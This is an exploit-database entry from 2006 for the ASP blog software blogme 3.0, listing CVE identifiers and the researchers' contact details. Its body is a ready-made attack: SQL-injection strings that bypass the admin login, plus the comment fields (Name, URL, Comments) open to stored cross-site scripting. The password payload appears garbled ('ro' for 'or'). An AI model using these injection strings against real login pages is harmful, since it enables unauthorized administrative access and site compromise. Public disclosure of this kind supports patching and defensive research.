blogme 3.0 - Cross-Site Scripting / Authentication Bypass

Author: Security Access Point
type: webapps
platform: asp
port: 
date_added: 2006-11-13  
date_updated:   
verified: 1  
codes: OSVDB-30427;CVE-2006-5976;OSVDB-30426;CVE-2006-5975  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2781.txt  
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high


admin login bypass :
user : ' or '1' = '1
passwd:  1'='1' ro '

xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-14]